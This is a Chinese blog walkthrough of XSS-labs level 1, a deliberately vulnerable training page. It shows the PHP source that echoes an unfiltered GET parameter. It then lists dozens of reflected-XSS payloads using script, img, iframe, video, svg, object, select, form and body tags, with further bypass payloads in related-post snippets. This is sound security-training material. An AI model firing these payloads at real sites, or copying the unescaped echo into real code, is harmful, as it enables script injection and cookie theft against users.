XSS-labs-level1详解

已于 2023-05-23 13:35:21 修改
阅读量165 收藏 1
点赞数 1
分类专栏: XSS-labs 文章标签: xss php 服务器
于 2023-05-19 14:55:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/130765945
版权
文章详细分析了一个网页代码,该代码接受名为“name”的GET参数并用JavaScript的alert函数处理,存在XSS漏洞。用户可以通过构造特定的GET请求,利用script、img、iframe、video、svg、object、select、form等HTML标签进行XSS攻击,触发弹窗或执行其他恶意脚本。
摘要由CSDN通过智能技术生成

访问题目url

我们分析一下代码层面:

接受名为“name”的GET参数并在页面上显示它。其中包含了一个对alert()的覆盖。当alert()被调用时,它将显示一个确认框提示,然后将页面重定向到“level2.php?keyword=test”的URL,这将把关键字“test”作为GET参数传递给下一个页面。

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level2.php?keyword=test"; 
}
</script>
<title>欢迎来到level1</title>
</head>
<body>
<h1 align=center>欢迎来到level1</h1>
<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
<center><img src=level1.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>

 由于没有什么过滤所以大部分使用JavaScript标签法的xss语句均可进行弹窗操作。进行拼接即可

http://127.0.0.1/xss-labs-master/level1.php?name=<script>alert('xss')</script>

script标签

<script>alert('xss')</script>
<script>alert(/xss/)</script>
<script>alert(123)</script>

img标签

<img src=x onerror="alert(1)">
<img src=x onerror=eval("alert(1)")>
<img src=1 onmouseover="alert('xss');">
<img src=1 onmouseout="alert('xss');">
<img src=1 onclick="alert('xss');">

iframe标签

<iframe src="javascript:alert(1)">test</iframe>
<iframe onload="alert(document.cookie)"></iframe>
<iframe onload="alert('xss');"></iframe>
<iframe onload="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
<iframe onmouseover="alert('xss');"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

video标签

<video src=x onerror=alert(1)>
<video><source onerror="alert('xss');"></video>
<video controls onmouseover="alert('xss');"></video>
<video controls onfocus="alert('xss');" autofocus=""></video>
<video controls onclick="alert('xss');"></video>

svg标签

<svg onload=javascript:alert(1)>
<svg onload="alert('xss');"></svg>

object标签

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>

select标签

<select onfocus="alert('xss');" autofocus></select>
<select onmouseover="alert('xss');"></select>
<select onclick=eval("alert('xss');")></select>

form标签

<form method="x" action="x" onmouseover="alert('xss');"><input type=submit></form>
<form method="x" action="x" onmouseout="alert('xss');"><input type=submit></form>
<form method="x" action="x" onmouseup="alert('xss');"><input type=submit></form>

body标签

<body onload="alert('xss');"></body>

仲瑿
关注
专栏目录
xss-level1
Lu__xiao的博客
02-24 4106
首先搭建xss靶场 打开浏览器输入地址来到第一关 这里我先查看了一下源代码 先试一下弹出会话框 name=<script>alert(1);</script> 可以看到直接弹出来了页面
记录xss练习 level1-level5(一)
CN_DS的博客
11-28 1037
练习网址:http://test.xss.tv/ 本人菜鸟一枚,如有分析不对的地方,望前辈们指正。 话不投机....不对,话不多说直接上图,上分析。 level1:很简单的一道题,从URL中我们可以分析到,xxx/level1.php?name=test,有一个参数;然后在firebug或源码页面找到它所在的位置,发现只有一处,在<h1></h1>标签内,直接一‘脚’...
新手打 XSS-level(1-13) 靶场心得和总结
最新发布
m0_73992753的博客
07-13 982
新手学习 XSS-level(1-13)练级
xss level1-7
qq_62046696的博客
04-28 704
第一关,很简单直接命令就可以通过 <script>alert(1)</script> 第二关发现运用第一关的命令已经不能通过, 所以需要先闭合,"> <script> alert(1) </script> 即可通过 Level3 输入的 "> < 被做了转义处理,变成了">< 所以需要换一个事件执行,比如oninput触发事件 ' oninput='alert(343)这样就可以通过了,因为可以试验 ’ ” <.
XSS实战(Level1-10小试牛刀)
Hala
05-15 1791
文章目录XSS实战说明level1level2level3level4level5level6strtolower()函数说明参数范例level7level8HTML实体转码level9PHP strpos()函数定义和用法相关函数:语法技术细节level10总结: XSS实战 说明 环境 Metasploitable2-Linux 步骤: 1. 判断是否存在XSS攻击的可能(提交的内容,页面会显示出来) 2. 判断可输入内容在标签内(属性)还是值 3. 判断闭合(在标签内部的话就需要提前闭合,使XSS
xss-labs通关攻略教程(level1~level 10)
m0_55854679的博客
07-23 4594
level 1 观察题目,发现用户名在url处被提交,且输出用户名的长度为4 2. 查看源码,发现参数未进行任何过滤,猜测为反射型xss 3. 修改name参数为<script>alert("xss")</script> level 2 观察页面提示,发现依然为反射型xss,但是与上一关不同之处在于有了搜索框。 尝试添加与上一关相同的参数 查看源码,发现<和>被HTML字符实体化为&lt、&gt,"被HTML字符实体化为&quot .
xss-labs通关详解 Level 1-5
qq_41755084的博客
10-25 877
测试xss漏洞的JavaScript弹窗代码:
xss-labs通关详解 Level 11-15
qq_41755084的博客
10-26 1250
这一关比上一关多了一个标签,其他没有变化,先试一下上一关的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一关的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
xss-labs-master源码
07-06
XSS Labs Master源码详解:深度探索跨站脚本攻击与防御》 XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-...
xss-labs通关详解 Level 6-10
qq_41755084的博客
10-25 1009
这一关整体上与第五关类似,只是黑名单的量增加了,尝试了href、src等字段,都被替换掉了。不过这个黑名单是大小写敏感的,而在html语句中,大小写不敏感。我们可以使用大小写字段进行绕过。构造注入代码从keyword参数处传入。将href的f大写,变为hreF,绕过黑名单,页面上成功插入了标签。点击该标签,成功弹窗。
XSS-labs通关(超详细)
wulanlin的博客
12-30 7034
1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看到使
xss挑战赛 level 1-13
yukinorong的博客
08-19 1017
08/19 刷题网站1 http://test.xss.tv xss挑战需要用火狐浏览器,可能是谷歌浏览器对xss有保护措施。 xss挑战 level 1 第一题为反射性xss,直接构造参数为<script>alert(1)</script>即可 xss挑战 level 2 查看源码发现输入框在Input标签中,先闭合标签,在插入。 "><script>a...
XSS小游戏level1-18解题思路
qq_51534701的博客
08-22 913
XSS过关游戏 level1 f12,然后在能执行的地方插入onclick=“alert(1)”,然后过关 level2 输入框输入测试内容,接下来每关都会先测试,然后查看源码 由源码可知,需要闭合 所以输入 "><script>alert(1)</script> level3 由源码可知,尖括号被转义,还需闭合 所以输入 ' onclick='alert(1)' 然后点击输入的地方 level4 由源码可知,尖括号被过滤了,需要闭合 所以输入 " on
xss-labs通关攻略教程(level1~level 10(2)
m0_60388292的博客
03-18 635
同样被恶意添加了下划线4. 使用标签来测试,同样href被恶意添加下划线5. 对href尝试大小写绕过6. 查看服务器端源码将get方式传递到服务器端的keyword参数的值赋值给str变量。用字符
xss-labs靶场 level 1-4
2301_79442654的博客
03-09 683
在url栏发现:?name=找到了注入点,试试无过滤情况的触发标签</script>
XSS挑战level1
博客
03-08 136
寻找注入点,页面没有用户可输入的地方,查看url 测试参数name=可输入,并将我们输入的内容显示在网页 首先输入</h2>把原有的<h2>标签合上,输入我们的js代码,查看会不会弹窗 使用xss的payload进行通关 ...
XSS跨站脚本攻击(level1-10)
不知名白帽的博客
05-31 2374
XSS(跨站请求伪造)level1-10关的题目讲解。
xss-labs通关攻略教程(level1~level 10
m0_60388338的博客
03-18 792
猜测在服务器端对keyword这个参数使用了函数,但是value参数中的值未被恶意编码,其中输入的payload被赋值给value,可以考虑闭合value的参数值。">//level 3——单引号闭合并添加事件尝试提交一个随便的参数,查看url中是否有提示输入构造的弹窗测试语句查看页面响应并查看网页源代码发现于上一关基本相同,区别在于value值也被转义。4. 对照服务器端的源码,keyword和value两个参数均使用了函数,且参数value的闭合方式为单引号。5. 最后的和。
XSS闯关小游戏通关笔记
skynet_x的博客
10-29 1236
level1 — 无过滤 查看源码,没有任何的过滤。 直接在链接中构造最基本的XSS弹窗即可,弹窗内容为123. <script>alert(123)</script> level2 — input中未设置过滤 查看源码,发现在echo输出中有一个函数htmlspecialchars() htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。可以看成是对特定字符的过滤。 预定义的字符是: & (和号)成为 & " (双引号)成为 "
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值